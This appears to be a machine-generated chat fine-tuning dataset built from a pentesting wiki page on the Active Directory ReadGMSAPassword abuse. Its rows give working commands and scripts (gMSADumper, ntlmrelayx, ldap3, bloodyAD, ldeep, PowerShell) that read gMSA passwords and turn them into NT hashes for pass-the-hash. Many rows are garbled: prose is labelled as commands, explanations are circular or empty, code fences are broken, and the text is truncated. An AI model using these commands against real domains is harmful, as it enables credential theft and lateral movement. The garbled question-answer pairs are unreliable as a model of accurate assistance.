{"role": "user", "content": "Walk me through ReadGMSAPassword"}, {"role": "assistant", "content": "This abuse stands out a bit from other abuse cases. It can be carried out when controlling an object that has enough permissions listed in the target gMSA account's msDS-GroupMSAMembership attribute's DACL. Usually, these objects are principals that were configured to be explictly allowed to use the gMSA account.\n\nThe attacker can then read the gMSA (group managed service accounts) password of the account if those requirements are met.\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, gMSADumper (Python) can be used to read and decode gMSA passwords. It supports cleartext NTLM, pass-the-hash and Kerberoas authentications.\n\n``bash\ngMSADumper.py -u 'user' -p 'password' -d 'domain.local'\n`\n\nAlternative 1: Impacket's ntlmrelayx (Python) tool can be used to read and decode gMSA passwords. :warning: Some tests showed ntlmrelayx missed entries gMSADumper didn't.\n\n`bash\nntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs \n`\n\n> [!TIP]\n> In order to easily fake a relayed authentication, once the relay servers are up and running, the tester can browse http://127.0.0.1/ in order to trigger a basic authentication that will then be relayed by ntlmrelayx, like this.\n\n---\nAlternative 2: The msDS-ManagedPassword attribute can also be manually obtained by running the following Python script. The following Python code can then be used to decode the blob.\n\n`python\nimport ldap3\ntarget_dn = \"\" # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'\ndomain = \"domain\"\nusername = \"username\"\nuser = \"{}\\\\{}\".format(domain, username)\npassword = \"password\"\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])\nprint(connection.entries)\n`\n---\nAlternative 3: Using bloodyAD"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through ReadGMSAPassword", "response": "This abuse stands out a bit from other abuse cases. It can be carried out when controlling an object that has enough permissions listed in the target gMSA account's msDS-GroupMSAMembership attribute's DACL. Usually, these objects are principals that were configured to be explictly allowed to use the gMSA account.\n\nThe attacker can then read the gMSA (group managed service accounts) password of the account if those requirements are met.\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, gMSADumper (Python) can be used to read and decode gMSA passwords. It supports cleartext NTLM, pass-the-hash and Kerberoas authentications.\n\n``bash\ngMSADumper.py -u 'user' -p 'password' -d 'domain.local'\n`\n\nAlternative 1: Impacket's ntlmrelayx (Python) tool can be used to read and decode gMSA passwords. :warning: Some tests showed ntlmrelayx missed entries gMSADumper didn't.\n\n`bash\nntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs \n`\n\n> [!TIP]\n> In order to easily fake a relayed authentication, once the relay servers are up and running, the tester can browse http://127.0.0.1/ in order to trigger a basic authentication that will then be relayed by ntlmrelayx, like this.\n\n---\nAlternative 2: The msDS-ManagedPassword attribute can also be manually obtained by running the following Python script. The following Python code can then be used to decode the blob.\n\n`python\nimport ldap3\ntarget_dn = \"\" # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'\ndomain = \"domain\"\nusername = \"username\"\nuser = \"{}\\\\{}\".format(domain, username)\npassword = \"password\"\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])\nprint(connection.entries)\n`\n---\nAlternative 3: Using bloodyAD", "metadata": {"corpus_index": 440, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use gMSADumper.py for readgmsapassword?"}, {"role": "assistant", "content": "gMSADumper.py -u 'user' -p 'password' -d 'domain.local'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use gMSADumper.py for readgmsapassword?", "response": "gMSADumper.py -u 'user' -p 'password' -d 'domain.local'", "metadata": {"corpus_index": 441, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "gMSADumper.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on ReadGMSAPassword"}, {"role": "assistant", "content": "gMSADumper.py -u 'user' -p 'password' -d 'domain.local'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on ReadGMSAPassword", "response": "gMSADumper.py -u 'user' -p 'password' -d 'domain.local'", "metadata": {"corpus_index": 441, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `gMSADumper.py -u 'user' -p 'password' -d 'domain.local'`?"}, {"role": "assistant", "content": "This command is used for readgmsapassword. ReadGMSAPassword"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `gMSADumper.py -u 'user' -p 'password' -d 'domain.local'`?", "response": "This command is used for readgmsapassword. ReadGMSAPassword", "metadata": {"corpus_index": 441, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ntlmrelayx.py syntax for readgmsapassword?"}, {"role": "assistant", "content": "ntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ntlmrelayx.py syntax for readgmsapassword?", "response": "ntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs", "metadata": {"corpus_index": 442, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntlmrelayx.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do ReadGMSAPassword"}, {"role": "assistant", "content": "ntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do ReadGMSAPassword", "response": "ntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs", "metadata": {"corpus_index": 442, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs`?"}, {"role": "assistant", "content": "This command is used for readgmsapassword. ReadGMSAPassword"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs`?", "response": "This command is used for readgmsapassword. ReadGMSAPassword", "metadata": {"corpus_index": 442, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use import for readgmsapassword?"}, {"role": "assistant", "content": "import ldap3\ntarget_dn = \"\" # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'\ndomain = \"domain\"\nusername = \"username\"\nuser = \"{}\\\\{}\".format(domain, username)\npassword = \"password\"\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])\nprint(connection.entries)"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use import for readgmsapassword?", "response": "import ldap3\ntarget_dn = \"\" # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'\ndomain = \"domain\"\nusername = \"username\"\nuser = \"{}\\\\{}\".format(domain, username)\npassword = \"password\"\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])\nprint(connection.entries)", "metadata": {"corpus_index": 443, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "import"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through ReadGMSAPassword"}, {"role": "assistant", "content": "import ldap3\ntarget_dn = \"\" # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'\ndomain = \"domain\"\nusername = \"username\"\nuser = \"{}\\\\{}\".format(domain, username)\npassword = \"password\"\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])\nprint(connection.entries)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through ReadGMSAPassword", "response": "import ldap3\ntarget_dn = \"\" # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'\ndomain = \"domain\"\nusername = \"username\"\nuser = \"{}\\\\{}\".format(domain, username)\npassword = \"password\"\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])\nprint(connection.entries)", "metadata": {"corpus_index": 443, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `import ldap3`?"}, {"role": "assistant", "content": "This command is used for readgmsapassword. ReadGMSAPassword"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `import ldap3`?", "response": "This command is used for readgmsapassword. ReadGMSAPassword", "metadata": {"corpus_index": 443, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the bloodyAD command for readgmsapassword"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object $TargetObject --attr msDS-ManagedPassword"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the bloodyAD command for readgmsapassword", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object $TargetObject --attr msDS-ManagedPassword", "metadata": {"corpus_index": 444, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "bloodyAD"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform ReadGMSAPassword?"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object $TargetObject --attr msDS-ManagedPassword"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform ReadGMSAPassword?", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object $TargetObject --attr msDS-ManagedPassword", "metadata": {"corpus_index": 444, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object $TargetObject --attr msDS-ManagedPassword`?"}, {"role": "assistant", "content": "This command is used for readgmsapassword. ReadGMSAPassword"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get object $TargetObject --attr msDS-ManagedPassword`?", "response": "This command is used for readgmsapassword. ReadGMSAPassword", "metadata": {"corpus_index": 444, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ldeep syntax for readgmsapassword?"}, {"role": "assistant", "content": "ldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" gmsa -t $TargetObject"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ldeep syntax for readgmsapassword?", "response": "ldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" gmsa -t $TargetObject", "metadata": {"corpus_index": 445, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ldeep"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform ReadGMSAPassword?"}, {"role": "assistant", "content": "ldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" gmsa -t $TargetObject"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform ReadGMSAPassword?", "response": "ldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" gmsa -t $TargetObject", "metadata": {"corpus_index": 445, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" gmsa -t $TargetObject`?"}, {"role": "assistant", "content": "This command is used for readgmsapassword. ReadGMSAPassword"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ldeep ldap -d \"$DOMAIN\" -s \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" gmsa -t $TargetObject`?", "response": "This command is used for readgmsapassword. ReadGMSAPassword", "metadata": {"corpus_index": 445, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Save the blob to a variable"}, {"role": "assistant", "content": "$gmsa = Get-ADServiceAccount -Identity 'Target_Account' -Properties 'msDS-ManagedPassword'\n$mp = $gmsa.'msDS-ManagedPassword'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Save the blob to a variable", "response": "$gmsa = Get-ADServiceAccount -Identity 'Target_Account' -Properties 'msDS-ManagedPassword'\n$mp = $gmsa.'msDS-ManagedPassword'", "metadata": {"corpus_index": 446, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Save the blob to a variable?"}, {"role": "assistant", "content": "$gmsa = Get-ADServiceAccount -Identity 'Target_Account' -Properties 'msDS-ManagedPassword'\n$mp = $gmsa.'msDS-ManagedPassword'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Save the blob to a variable?", "response": "$gmsa = Get-ADServiceAccount -Identity 'Target_Account' -Properties 'msDS-ManagedPassword'\n$mp = $gmsa.'msDS-ManagedPassword'", "metadata": {"corpus_index": 446, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Build a NT-Hash for PTH"}, {"role": "assistant", "content": "(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword | ConvertTo-NTHash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Build a NT-Hash for PTH", "response": "(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword | ConvertTo-NTHash", "metadata": {"corpus_index": 447, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Build a NT-Hash for PTH during a pentest?"}, {"role": "assistant", "content": "(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword | ConvertTo-NTHash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Build a NT-Hash for PTH during a pentest?", "response": "(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword | ConvertTo-NTHash", "metadata": {"corpus_index": 447, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Alterantive: build a Credential-Object with the Plain Password work?"}, {"role": "assistant", "content": "$cred = new-object system.management.automation.PSCredential \"Domain\\Target_Account\",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword\n``\n\nThe second one relies on GMSAPasswordReader (C#).\n\n`bash\n.\\GMSAPasswordReader.exe --AccountName 'Target_Account'\n`\n\nThe third one relies on the Invoke-PassTheCert fork, authenticating through Schannel via PassTheCert (PowerShell).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Alterantive: build a Credential-Object with the Plain Password work?", "response": "$cred = new-object system.management.automation.PSCredential \"Domain\\Target_Account\",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword\n``\n\nThe second one relies on GMSAPasswordReader (C#).\n\n`bash\n.\\GMSAPasswordReader.exe --AccountName 'Target_Account'\n`\n\nThe third one relies on the Invoke-PassTheCert fork, authenticating through Schannel via PassTheCert (PowerShell).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 448, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Alterantive: build a Credential-Object with the Plain Password?"}, {"role": "assistant", "content": "$cred = new-object system.management.automation.PSCredential \"Domain\\Target_Account\",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword\n``\n\nThe second one relies on GMSAPasswordReader (C#).\n\n`bash\n.\\GMSAPasswordReader.exe --AccountName 'Target_Account'\n`\n\nThe third one relies on the Invoke-PassTheCert fork, authenticating through Schannel via PassTheCert (PowerShell).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Alterantive: build a Credential-Object with the Plain Password?", "response": "$cred = new-object system.management.automation.PSCredential \"Domain\\Target_Account\",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword\n``\n\nThe second one relies on GMSAPasswordReader (C#).\n\n`bash\n.\\GMSAPasswordReader.exe --AccountName 'Target_Account'\n`\n\nThe third one relies on the Invoke-PassTheCert fork, authenticating through Schannel via PassTheCert (PowerShell).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 448, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the The command to alterantive: build a credential-object with the plain password"}, {"role": "assistant", "content": "The second one relies on [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the The command to alterantive: build a credential-object with the plain password", "response": "The second one relies on [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#).", "metadata": {"corpus_index": 449, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Alterantive: build a Credential-Object with the Plain Password during a pentest?"}, {"role": "assistant", "content": "The second one relies on [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Alterantive: build a Credential-Object with the Plain Password during a pentest?", "response": "The second one relies on [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#).", "metadata": {"corpus_index": 449, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The second one relies on [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#).`?"}, {"role": "assistant", "content": "This command is used for alterantive: build a credential-object with the plain password. Alterantive: build a Credential-Object with the Plain Password"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The second one relies on [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#).`?", "response": "This command is used for alterantive: build a credential-object with the plain password. Alterantive: build a Credential-Object with the Plain Password", "metadata": {"corpus_index": 449, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use The for alterantive: build a credential-object with the plain password?"}, {"role": "assistant", "content": "The third one relies on the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using 